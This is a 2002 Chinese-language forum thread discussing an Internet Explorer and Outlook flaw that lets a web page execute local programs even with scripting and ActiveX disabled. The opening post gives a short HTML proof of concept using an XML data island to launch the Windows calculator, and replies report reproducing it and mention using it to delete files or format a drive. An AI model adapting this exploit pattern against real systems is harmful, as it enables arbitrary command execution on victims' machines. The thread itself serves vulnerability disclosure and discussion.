找回密码
 立即注册
搜索
查看: 1007|回复: 12

何须脚本 网页就能执行任何恶意命令!

[复制链接]

60

主题

73

回帖

199

积分

海星

积分
199
发表于 2002-3-6 13:02:28 | 显示全部楼层 |阅读模式
一位以色列安全专家发现,只要使用一小段HTML代码,就可以让Windows系统自动执行任何本地命令。这一漏洞可在IE、Outlook和OutlooK Express上发生,即使在这些程序的安全设定中已经禁止掉了ActiveX和脚本的执行。究其根源,它是由一个早在IE4时代就存在的名为DSO的漏洞引起的。有兴趣的话,大家可以研究一下下面这段可以自动运行Windows计算器的代码。

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
   <security>
      <exploit>
         <![CDATA[
         <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
         ]]>
      </exploit>
   </security>
</xml>

327

主题

3264

回帖

3641

积分

荣誉版主

积分
3641
发表于 2002-3-6 13:04:48 | 显示全部楼层
估计是ie自带了xmlparse,哎
回复

使用道具 举报

60

主题

73

回帖

199

积分

海星

积分
199
 楼主| 发表于 2002-3-6 13:22:47 | 显示全部楼层

好可怕

我都不敢上网了
现在只去大的网站,一般个人网站都不去
回复

使用道具 举报

1130

主题

973

回帖

2766

积分

注册会员

积分
2766
发表于 2002-3-6 14:47:28 | 显示全部楼层

Re: 好可怕

最初的帖子在 小希格玛
[B]我都不敢上网了
现在只去大的网站,一般个人网站都不去 [/B]

真的嘛?我想不会吧!
回复

使用道具 举报

24

主题

427

回帖

638

积分

高级会员

积分
638
发表于 2002-3-6 16:00:29 | 显示全部楼层
测试了一下,真的太可怕了,M$怎么没有补丁呢?
回复

使用道具 举报

60

主题

73

回帖

199

积分

海星

积分
199
 楼主| 发表于 2002-3-6 16:07:14 | 显示全部楼层

才发现的漏洞

出PACK可能要晚点
回复

使用道具 举报

10

主题

478

回帖

710

积分

高级会员

积分
710
发表于 2002-3-6 19:04:39 | 显示全部楼层
我用win2000+ie6,将代码中的c:\windows 改为此c:\winnt 果然计算器执行了,实在是可怕。看来以后装机时不能把系统装在默认的目录下。
回复

使用道具 举报

60

主题

73

回帖

199

积分

海星

积分
199
 楼主| 发表于 2002-3-7 09:59:18 | 显示全部楼层

我用WIN2000+IE6和XP+IE6都测试过了

最初的帖子在 一天
[B]。 [/B]


都有该漏洞,主要是看你安装的目录了
以后安装目录可得要该了呀
回复

使用道具 举报

24

主题

427

回帖

638

积分

高级会员

积分
638
发表于 2002-3-7 10:27:59 | 显示全部楼层
该安装目录也没用,可以获得系统环境变量,或干脆将C: format,我已测试将temp目录中的文件全部删除。
回复

使用道具 举报

2

主题

9

回帖

15

积分

新手上路

积分
15
发表于 2002-3-7 10:51:21 | 显示全部楼层

没反应吗。

不就把它加入html文件中吗。用浏览器没反应呀。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|海浩社区

GMT+8, 2025-9-15 02:58 , Processed in 0.126413 second(s), 20 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表